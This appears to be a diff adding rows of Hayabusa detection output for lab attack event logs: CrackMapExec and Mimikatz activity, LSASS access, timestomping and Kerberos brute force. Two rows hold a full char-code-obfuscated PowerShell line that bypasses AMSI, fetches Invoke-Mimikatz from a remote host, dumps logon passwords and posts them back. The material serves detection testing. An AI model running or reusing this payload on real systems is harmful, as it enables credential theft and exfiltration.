+2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b29,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b4e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b70,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157bac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:sef/srey/admtest/vase/xt/s/ysy/vrat/yvsyv/xc/g/mgdi/rec/vga/ytuntsr/vdr/m,og/b aer/nd/test2/vt/gsdf/dyfgdhbn/tfay/bdcy/sgfg/vs/sfs/uydzry/bsfin/rey/syvsdy/tary/ryver/yvas/vay/tc/ugu/go/test1/xvtrz/ar/nini/tbyt/accrt/wyt IpAddress:::ffff:10.23.123.11 timeframe:24h",../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,-
+2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_25e3b4425ffd47aab/SM_27d255b6407743b08/SM_957258b5879242afb/SM_374806bcc65140a5a/SM_2f6964c8f421408ab/krbtgt/Guest/administrator/Administrator/SM_6aaeeb113c0c4af3a/SM_b2a35e76f50a4c23a/Test-ADM/SM_8b9faa99d83446d1b/SM_2b6f1a51ac6c41b2a/DefaultAccount/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,-
